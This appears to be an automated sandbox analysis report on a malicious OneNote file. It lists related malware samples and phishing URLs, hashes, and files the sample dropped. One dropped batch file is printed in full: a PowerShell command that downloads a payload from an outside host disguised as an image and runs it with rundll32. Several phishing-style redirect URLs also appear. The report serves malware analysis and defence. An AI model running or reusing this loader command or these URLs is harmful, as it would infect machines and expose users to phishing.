	FAXMESSAGE.exe	Get hash	malicious	Browse	144.217.139.27
	PAGO SWIFT PDF__.pif.exe	Get hash	malicious	Browse	144.217.139.27
	Original.one	Get hash	malicious	Browse	144.217.139.27
	RFQ-N-12192.1.exe	Get hash	malicious	Browse	144.217.139.27
	FSSC-23-0103000RPM.PDF.exe	Get hash	malicious	Browse	144.217.139.27
	svc.exe	Get hash	malicious	Browse	144.217.139.27
	Req For F1 USD 33 325.00.exe	Get hash	malicious	Browse	144.217.139.27
	Encargar art#U00edculos.exe	Get hash	malicious	Browse	144.217.139.27
	file.vbs	Get hash	malicious	Browse	144.217.139.27
	1wJ47b5qX6.exe	Get hash	malicious	Browse	144.217.139.27
	QT21.pdf.lnk	Get hash	malicious	Browse	144.217.139.27
37f463bf4616ecd445d4a1937da06e19	ACH_Electronic_Deposit.shtml	Get hash	malicious	Browse	72.163.4.185
	A7l7B2E3Ek.exe	Get hash	malicious	Browse	72.163.4.185
	Application_debloated.exe	Get hash	malicious	Browse	72.163.4.185
	https://app.box.com/s/e25h4kyxp2a0bapw0cw6hszdjtzocatp	Get hash	malicious	Browse	72.163.4.185
	http://www.derp7.cf/	Get hash	malicious	Browse	72.163.4.185
	200333852-042536-sanlccjavap0004-4332.pdf.exe	Get hash	malicious	Browse	72.163.4.185
	file.exe	Get hash	malicious	Browse	72.163.4.185
	elementrv Remittance.html	Get hash	malicious	Browse	72.163.4.185
	AR_STATEMENT_13740_ARIHANT ELECTRI_02JEN06_115700.exe	Get hash	malicious	Browse	72.163.4.185
	https://www.googleadservices.com/pagead/aclk?sa=L&ai=CkwvK0P_hY8HmHqzkn88PyfuFuAWgo7fvbs6fqp-VEZGs05XEOBABIIHZ_iFgyQagAZOftLAoyAEJqQLjAdLjEvh5PqgDAcgDywSqBNcBT9DF_iX400IybEW3Pr6wAP-unvMjI3QSAapE6PY1e4nW5NWKB41op30pMboy0XCoPrXu7CNTcCMGeey1XtmKUgKbua3PEd7d8iSVBezN1_nZqT0JcBzMecORTxu_F8eCphEg6iih3KhpzzdErNKbKHo4QV0ywpPFvMuZ3jo2yS4wpXHFiWkk5VTaH9WZi4OenRX7ZqzE2P8_pKVLM30PUS0k-HTbrJJ-9SAoN4qZ0SoufwzHZ2CbVg2_WHfzg3cj_ZXuCwBLBhnHmi0ale5VhZw_d81os6TABPq-rLGbBKAGLoAHnKTY_QOoB47OG6gHk9gbqAfulrECqAf-nrECqAeko7ECqAfVyRuoB6a-G6gHmgaoB_PRG6gHltgbqAeqm7ECqAf_nrECqAffn7EC2AcA0ggPCIBhEAEYHzICigI6AoBAsQkBrnSxVCnjCIAKAZgLAcgLAYAMAbgMAdgTDNAVAfgWAYAXAQ&ae=1&num=1&cid=CAQSOwDUE5ymZxT0dLU_6yG71JZyq7bVZF3KxZaaSOrqGKatE9XZNh61FPPUu9DHSG-OenQe7WgVmA55if6mGAE&sig=AOD64_1lTBUid_DTEGtbwCI40J1FZksITw&client=ca-pub-9816945270938969&rf=1&nb=9&adurl=http://nu.fekru.rlntlss.net%3A%2F%2F%23aHR0cHM6Ly9teWZhbWlseWFjdS5jb20vbmV3L2F1dGgvQ29uZGVuYXN0L2tlZWxleS5rbm93bGVzQGNvbmRlbmFzdC5jby51aw==	Get hash	malicious	Browse	72.163.4.185
	JUSTIFICANTE DE TRANSFERENCIA.exe	Get hash	malicious	Browse	72.163.4.185
	https://googleweblight.com/i?u=https%3a%2f%2feu2concur.web.app%2fjr9s0h3rbF4z5kQ5kQa51r9sF4zn5kQF4zrs5kQa5kQF4zbankd07r9s0h3nW1&c=212221	Get hash	malicious	Browse	72.163.4.185
	95543.html	Get hash	malicious	Browse	72.163.4.185
	Please DocuSign - Documents Pending eSignature.html	Get hash	malicious	Browse	72.163.4.185
	ePaQLI5RyP.exe	Get hash	malicious	Browse	72.163.4.185
	z3tYlqYItl.exe	Get hash	malicious	Browse	72.163.4.185
	file.vbs	Get hash	malicious	Browse	72.163.4.185
	https://strava.app.link/zjq?%243p=e_et&%24original_url=http://ugb.ojs.xvox.gr///.?QQQ#.bWRpc2Fub0BhbGdvbWEuY29t=	Get hash	malicious	Browse	72.163.4.185
	jGQGty5EA2.exe	Get hash	malicious	Browse	72.163.4.185
	Fw user Ball shared Severn Valley Railway with you.msg	Get hash	malicious	Browse	72.163.4.185

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\76d4c8d1.dll	qopceyu.dll	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	06mNIWJoVz.exe	Get hash	malicious	Browse
	5W8kRNoAdB.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	RS9009.img	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	Grant#2929.html	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	RFSL#6617.img	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	dBDfcVVkIk.exe	Get hash	malicious	Browse
	l39HA25qjw.exe	Get hash	malicious	Browse
	44491.6090605324.dat.dll	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\in.cmd

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	174
Entropy (8bit):	5.171914439500308
Encrypted:	false
SSDEEP:	3:2EKDDGKSSJJFsLTzTH3x8J3k4kh8UWLRJRXAplVSCM2qKMJAFm7zBJTTeJ6Fk9zJ:0SGYzLh8JnkaUM+VSCCKMdXzTeJ62JzN
MD5:	FA49FD13FC49AB38B97D2D019CC04B39
SHA1:	D9CEACEE45290BD73AD582ED1AE6F5A6800DBD28
SHA-256:	F9A5106AC501E9DD700115310B20ED8AA0DBDAF854F556B44F04BBA1AE28B783
SHA-512:	330F2C9D62808567910C23D61EBEF0DAF1843C48BBD6A2E49479E1AAF93BB5A807DCABA4AB31792EB1E9620184FA3A810D9901D7B22EFDABF2131A1D67102D51
Malicious:	true
Preview:	..@echo off..powershell Invoke-WebRequest -URI https://starcomputadoras.com/lt2eLM6/01.gif -OutFile C:\programdata\putty.jpg..rundll32 C:\programdata\putty.jpg,Wind..exit....

C:\ProgramData\putty.jpg

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.468703571312251
Encrypted:	false
SSDEEP:	96:M4UU1kJLZevpB01M45B7rvAHl1uaL2JZ3KeopG3YxDgglBdN:KWX23zMG3YxBdN
MD5:	4FA7084A034DD4E84D5F567476AA9FBB
SHA1:	7E8C974A7C1F54D6C18F24C617DFE29BAFD6ED26
SHA-256:	F716C2324C1E7DEFED9B822F543156934C3534EEDC9EF1E69FC3745733C5DCB7
SHA-512:	BE1E937B3E6CB6A961BE6BE342FD839C41941FB8EDFA7CD1A329FC0434FD817D5427A431B8E0AE7E757F5C409B08447BAB4358E0F2437189F9577D2DE3B2335A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..... ...................0....4i......................................@... .........................5.......................................\...................................................................................text...4........ ..................`.P`.data........0.......$..............@.`..rdata...u...@...v...&..............@.`@.bss..................................`..edata..5...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls....s...........................@.0..reloc..\............\..............@.0B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\064969FC-AFD0-4F49-92AA-9AFA4DCD48CC

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	XML 1.0 document, ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	153877
Entropy (8bit):	5.3538488503792045
Encrypted:	false
SSDEEP:	1536:k+C7/gjDB6B9guwULQ9DQN+zezQKk4F77nXmvid8XR3EwrNz6I:9mQ9DQN+zezIX+g
MD5:	E3E0E950651763E6EF098A026E6EC400
SHA1:	045CBBCE5F173E068914597D6469C77732374D98
SHA-256:	B0DB72B69063B21CEC4C455EA57EEFF6E8E807E9427D6018113E3C305E29CDAE
SHA-512:	227E83FD4F3968793DCC1285DF7AC2DCAFC3B42DCD47123D1CF652EC7BF5635551ADA5039E77C681A35FCC3BBD337E8C186768F62312C20A99F57E085E5B3775
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-02-07T17:26:25">.. Build: 16.0.16130.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

C:\Users\user\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	XML 1.0 document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	289664
Entropy (8bit):	5.151340981300995
Encrypted:	false
SSDEEP:	1536:42/zodZIr6KPZ01u6uSivsUQK75IthMfK2Xua:Vrr6KPZ01u6uSivsUQK75IthQXN
MD5:	9C1A32F9C78C1998FD5E8CC83A9F2593
SHA1:	470AD5B6F44DA93A3632D4DA24DAEC72C3DE23F8
SHA-256:	67C716256C7FC67D6AA08DFB2FADF131874D0740771789D71744C45824327CD2
SHA-512:	190E7991DC9348ED2AA2F9DBF01CD3844040147D9B84316761CF6332F17A7F40FB0A0A7338660EEBD2FF2FAD7DD90EA6A9268B85E675562DFE901E3673FA427B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2"

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.09216609452072291
Encrypted:	false
SSDEEP:	3:lSWFN3l/klslpF/4llfll:l9F8E0/
MD5:	F138A66469C10D5761C6CBB36F2163C3
SHA1:	EEA136206474280549586923B7A4A3C6D5DB1E25
SHA-256:	C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
SHA-512:	9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
Malicious:	false
Preview:	SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-journal

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	4616
Entropy (8bit):	0.13760166725504608
Encrypted:	false
SSDEEP:	3:7FEG2l+2Cb/ul/FllkpMRgSWbNFl/sl+ltlslVlllfll2Cbn:7+/l7lg9bNFlEs1EP/mCb
MD5:	BE5295F9EF46C60247DB45D92FF15CC5
SHA1:	BFC9B8C132F74E3AC6B2462D793CB28BAEBC2B8A
SHA-256:	3D431C164E1CED55B8C8D585A11925775F152946F3BD3D012DCAAF9E310D36A9
SHA-512:	8C298E8258629A3941225665DF1F23646AC0D2D0F8B7D20858BF0156A9C7505342506C5AF8C49A0AFFDC9619AFE7E959CD344FA9A9182A035F5967F3B290F7B3
Malicious:	false
Preview:	.... .c.....9.g.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-shm

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.04482848510499482
Encrypted:	false
SSDEEP:	6:G4l28NHqxHYAl28NHqplSL9XXPH4l942U:l2iqB32iqW5A0
MD5:	35A22F28B8C7143C25BFF53B4A94CDBD
SHA1:	985A5A7CD3123750C6A107757CFEF4C70F87DC0B
SHA-256:	AB9D8896E16A9EACDF4E651AD69AB7A87829DE50BE2F331567826A5E5ECE8C37
SHA-512:	2114681E508E287F30BC2FC84FFFC38CE6D8C4BEA9FCA47E5525AB1A80BC89DBA50BAA7F1236A429B180F40BB248C4E1FB87876D8256532AA22868E06F403663
Malicious:	false
Preview:	..-........................B.=....P.......T...v..-........................B.=....P.......T...v........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-wal

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	45352
Entropy (8bit):	0.3957319445401107
Encrypted:	false
SSDEEP:	24:KylvVQ3zRDrRUll7DBtDi4kZERDPFzqt8VtbDBtDi4kZERDGg:3lvVQ1fRUll7DYMzFzO8VFDYM
MD5:	19C90D27CC1EABAB2D07C9322BA3C4D1
SHA1:	7A8E8B0D504C04D81454B05336415D5C986B86AA
SHA-256:	6D1FE436D3544A705764FE950195C9499F11E227FD3E1C264EC885016A02B7C7
SHA-512:	2EC5DF7F294854D0544B179A767D7F9D6B57DB27EDCC9A249660D14515E903C39166C5DBE146AAA42FC0CDB76871208A9DB70A1B50B71001FF673844853DE7B2
Malicious:	false
Preview:	7....-............P....._7...:............P........f....SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\Quick Notes.one (On 07-02-2023).one (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5272
Entropy (8bit):	1.2887870570760533
Encrypted:	false
SSDEEP:	12:BoYyfnj/UPQbP7EFFBtMVstO/mjEskKbLbziZRiotl7yR4VNuC:BoYyfnYyP76tOstR4l6Tijie0+7
MD5:	7C2BC903DD3452C8174552041CD5AEA0
SHA1:	3213F62BE049A3D15BA9C5A632C0A9B80B96DEE2
SHA-256:	68FD09A71356EB9E6670934A31936453A5740EB5ED3D8079C66090A72F1C79C8
SHA-512:	223C31FD5A7D5CF0FE2FDA32535207BFC2042152C6807EC9E63DD7F915B3A33FB4130C3894BA2E41F9DFBABD23FF95B26240BE9ED80934D953A0347897D5B91C
Malicious:	false
Preview:	.R\{..M..Sx.)..`.....A....:.iR................?.....I...........................................................................................................h.............................................m...jI.p.....i.........L...vN.`.T.d.,............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\~Quick Notes.one.onebackupconstruction

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5272
Entropy (8bit):	1.2887870570760533
Encrypted:	false
SSDEEP:	12:BoYyfnj/UPQbP7EFFBtMVstO/mjEskKbLbziZRiotl7yR4VNuC:BoYyfnYyP76tOstR4l6Tijie0+7
MD5:	7C2BC903DD3452C8174552041CD5AEA0
SHA1:	3213F62BE049A3D15BA9C5A632C0A9B80B96DEE2
SHA-256:	68FD09A71356EB9E6670934A31936453A5740EB5ED3D8079C66090A72F1C79C8
SHA-512:	223C31FD5A7D5CF0FE2FDA32535207BFC2042152C6807EC9E63DD7F915B3A33FB4130C3894BA2E41F9DFBABD23FF95B26240BE9ED80934D953A0347897D5B91C
Malicious:	false
Preview:	.R\{..M..Sx.)..`.....A....:.iR................?.....I...........................................................................................................h.............................................m...jI.p.....i.........L...vN.`.T.d.,............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\notes.one (On 07-02-2023).one (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	108920
Entropy (8bit):	7.430912633758846
Encrypted:	false
SSDEEP:	3072:wkpgS2EJbyYeMYkKkyX3DWvLLATiXU1RgLq:ghjZrHDgT5G
MD5:	A86B75E79C4E63625590589D195051B4
SHA1:	C885EBEBC18CEFD8B8101EA264D9FC07D4D6C50C
SHA-256:	6243BBF1457D0174E4EDA48D856A953FB8DB9B310D3E22C3A3FD7EE4A5E6F0E5
SHA-512:	FD74A2C4F887C244956D636AC230FFB3DA531087C1CB19AD016B626D4917BE6840BDFD2C1728534832475EC081D7F6273B068AAC729F6FEBE93CBBA50B6E4DBC
Malicious:	false
Preview:	.R\{..M..Sx.)...R..~/GE..a.~.]................?.....I........................................................................................&..................h...........................x.......`........`....I...;...!........a.....G......z.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~notes.one.onebackupconstruction

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	108920
Entropy (8bit):	7.430912633758846
Encrypted:	false
SSDEEP:	3072:wkpgS2EJbyYeMYkKkyX3DWvLLATiXU1RgLq:ghjZrHDgT5G
MD5:	A86B75E79C4E63625590589D195051B4
SHA1:	C885EBEBC18CEFD8B8101EA264D9FC07D4D6C50C
SHA-256:	6243BBF1457D0174E4EDA48D856A953FB8DB9B310D3E22C3A3FD7EE4A5E6F0E5
SHA-512:	FD74A2C4F887C244956D636AC230FFB3DA531087C1CB19AD016B626D4917BE6840BDFD2C1728534832475EC081D7F6273B068AAC729F6FEBE93CBBA50B6E4DBC
Malicious:	false
Preview:	.R\{..M..Sx.)...R..~/GE..a.~.]................?.....I........................................................................................&..................h...........................x.......`........`....I...;...!........a.....G......z.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000000.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	5.193687458159123
Encrypted:	false
SSDEEP:	1536:9XA4z7aNOraby8mUE3452/G0CkassprNmL5CZ:dQy8mUEE2u0wzhN
MD5:	F9907A8E819C65200DC8EF2B4A7932CD
SHA1:	B41F7E4738795FD4BDAEF5BFED4A14887F8B669E
SHA-256:	09BE0BED6682A1EA823C9CC8C256842CCF03F6B03EFB100B3279447FFAD0E63A
SHA-512:	E24B32A47B8AD15F1D05934ECB68F7B8D11FEFFD85807A2CBD0958CAD413DE84433119AE91AE59F4538AC7CB0A98580624DB747380E190B502C9694A7012A3E4
Malicious:	false
Preview:	...@............$a..-Q..............lD...................@............$a..-Q................................h...................H.......X....................?.........@............$a..-Q....................................................H.......X...........P........HD.................`...........P.......................6........................................................................................................................................................?..............]...8...................$...........7F.\..lD.HD............&.x...Fx.=L.@...........@dF.@.........QK..j...C.................=L.@....................`..................................................................................................................................................?.F.......&.@..m..a.G...F.qM.......m;.H....7.5N.....?..(.....@....d....T.G...?..JZ......?.............?........)...*............H..1...<......d...SYH.W...).............gH..]...,t..........m;.H....7.5N

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000001.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.376451495895344
Encrypted:	false
SSDEEP:	384:3ouDrjkbh7xP2FSdnglXefaEHLplgS/nwRvCqoYWS/ZoWU7bnXxCO:3Ob3P2QdngluVDY4OBFUP
MD5:	0507657B9EBDDE1635C94D9FEA6AA614
SHA1:	E01509A85B71AD33EC0C27FC252B401836BE31A0
SHA-256:	981BE92B4698946D182A409A5870835121305D8335B0B846B83C7BC41A1ABDE1
SHA-512:	F746C696CD15FE6C0E7D23EFC0C298B66EC74765DD8F252088524B5DD66C49AF0D2E0BA6C474C9A5CF5CFD237D59AA37A58897417BBF7FED6409311C81DB0D45
Malicious:	false
Preview:	....................0...........0....+..PN...'....?............................................................................................................................. ....)..PN....9.....<..@...@.Op.b..F.$..i.......s.....K.Z.G.A......5'K.........s.....K.Z.G.A..................s.....K.Z.G.A............71..sg...)..p.B..................@.X.....C..p.'......s.....K.Z.G.A......U?.......A......B...l.............K.I.H.]yY.i......B......C.....c.......Le.._..R'WD..X.5'K.....H.hV...[...&{....s.....K.Z.G.A..........ez].}.....r+........................................................................................................................................H...:..@..........4@..B&. . .....#I1.R..I...v;...P.IEF.....C.r..KJO........L..71..sg...)..p.....$.......B......C.....c......s.....K.Z.G.A.................@X......+F..I.Un.w........R.ox..J.%..-...............4@..B&. . ........s.....K.Z.G.A............................4@..B&. . .....X.....C..p.'.......s....@B......@..9.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000002.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.3011799616107935
Encrypted:	false
SSDEEP:	24:x640+MyT+hzbwTDArLLJ/pUDsiAt/4vS2K+MH4i8bl6TBBESMB:xWzbWDA7UDitmS22y6TBBESu
MD5:	3A50638A031C65B5635D9E7A35B39A6E
SHA1:	E82E529A767A3E8332B759490DD9B012D853C49E
SHA-256:	B86C5CBEA0CB4D88115FD819D93074487FA84A283611D6A120CBBE35E22B1B6A
SHA-512:	0CA429B35333FEAB89AFD46F67C53927362202C71C58AA8DB67C554E253852E31BF7320B042FE3358AA6FA78F2920AD301F775A705187F1F8695BC25A51C9C01
Malicious:	false
Preview:	j...>.......................................................................................................................................................................$...j...>...^...........v.....Q.......Q.EThD.....,~.3.......3..U.[..0.d$..,..:..Eb.....r5.K..:..3..U.[..0.d$..,X3.....Q.EThD.....,~...Q..........3.......3..................................................3.......3..U.[..0.d$..,X.:.......:..Eb.....r5.K.2...^.............................Q................................QT.,..3....)..3..X.'..3...."........................................Q......:...c..,0...e...B4.$.........\|..tQ&G...%QE.3...%.:...........................4..(...(..........3....0...e... ..$.....m.....A.`q1.... .}..:..................0............4..e....5..b4............T-Do..-A...Q'.1.....(...(......%.:......5\|.....J.ID".U.O........v..C-.(H.C.0tF .....N...z...........................................................................................................v..C-.(H.C.0tF .............................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000003.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.825126942279515
Encrypted:	false
SSDEEP:	192:x2jfs9IrtR4pwdgnzpudnrCAKpQdgzee9J:x2jfsahRBdgn5AKmWL
MD5:	56C7FEB5BE4E413A395A8A065FEABB2F
SHA1:	762D6FA49EE980AA285D5FE5C2F40A5E5F2EF910
SHA-256:	294AB3540D532572BD7E828589EE30D072FEDBC07A97110E886F64DBB45A4DA2
SHA-512:	FB215FFE47011B61034E4D66A2F89E89F9FD59ED79F22CA77CE82EAF38A883956F0A4918302C420B959394E23F3F54DA67B05F7AB0F7502567C28F39DC639499
Malicious:	false
Preview:	....&..............@.......~........................................................?..?....................................................................&...............................\.2M...o.I%\.,.......,.X...A.K%..!/.J.......J..e"5L....}.z...................................................................,....................................................................5.............@.Lo..;..................,.............................................................................0...@...................M..$m(]..............P./.....Pi.....d.].....`.T........................................*.M..$m(]..........R....%.I.%................J.......J.................................................2...........f.....J.N.:...J.N.H..,..aEG............................................4..(...(.....aEG.....aEG.nL.O......g.J.......J..e"5L....}.z..W......W....I..iE.C."...............@.Lo..;...........................aEG..c..,..................&..................................@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.4133285644600075
Encrypted:	false
SSDEEP:	96:N+AnbrpgMFBDEb01ChAaJkluvxDuWiNAeuDcndin0InSRg:NprpvFhy0ESaqlup5euqdhR
MD5:	8AC8644A40161BC88696C7C0F7067732
SHA1:	852377231923E648C0E12F9D929354D6F8CD71A3
SHA-256:	AB070116A1294D3832E112B57437AA707F6C2B45616FE88557956E33EF6E322C
SHA-512:	5CCCF629D3F8FBE3E5AF7BA305EF92C10E19EE71A24A0629E26D7B57CDF07716C777FCAF82EC980AEB37630081CB3D709F019964C9161285C74E0B2184A3CA0A
Malicious:	false
Preview:	.......@0.......................................?.p......................................................................................................."......."X~.QL.J,>...............Hl6.J....C...:.......:....TM.{=Z...E...........Hl6.J....C...od>.t..A.Y.$..!od>.....f..C..iP...........Hl6.J....C.................................................................................5.............@.Lo..;............................................................................0.......................\...............Acl7.7.K...".`-............b.......j...................:.....".od>.....7F..............=q......=q..)....M]....@7F......7F.\..lD.HD............"......."....................................................v...B...p...x.{a....+d..=k......f..C..iP.......Hl6.J....C.............4..~...1...(...(...<...O.n.e.N.o.t.e. .N.o.t.e.b.o.o.k.s.\.M.y. .N.o.t.e.b.o.o.k.......M.y. .N.o.t.e.b.o.o.k.........=q..)....M]....@=q..x.{a....+d..=k..x.{.....f..C..iP....................:.....".od>.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.2723315143697413
Encrypted:	false
SSDEEP:	12:JYqh0rHeu+9WHeuMsPl6tMSMJV7RFLMhf7DIMdNd4XY7BHHeuMtx9Di9b:qFr+O+El6tMSe7zU7DIMdNd4INH+d/
MD5:	E32804B51A9CCB9FB7C53E05101674C7
SHA1:	E33AB84FA238E73B6943813505AFBAD1D5164E1D
SHA-256:	1D1F635981C5EBB258C6E1A1052ECA741FB0B1DE2C59EF42CE106B1D33C79366
SHA-512:	52EC970966954033BBD0DDF56C9C70517B38B5D42DCFBC29DB6B9864D3124292C31B1B299D3E581353725FFF38D329369380DBEEA18D55B0A0C0738D0A66ACF6
Malicious:	false
Preview:	....>...........x....................?...................................................................................................................................................................=.......=...XG.6.....;.2.......2.A."B...: .C.....$a..-Q........2.A."B...: .C..2...=...XG.6.....;.=........2....................................................................5.............@.Lo..;..................2........................................................./.....=@.,.fc...........................eD.U..RC...........h...N.................................................................../.....=@.,.fc...........eD.U..RC.................=.......=...................................................=...C...=.`.1...=...F....................................................4..~...1...(...(.......O.p.e.n. .S.e.c.t.i.o.n.s.......O.p.e.n. .S.e.c.t.i.o.n.s...........1.......O.p.e.n. .S.e.c.t.i.o.n.s....................$a..-Q.....2.......2.A."B...: .C.2.......................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.8025442894959007
Encrypted:	false
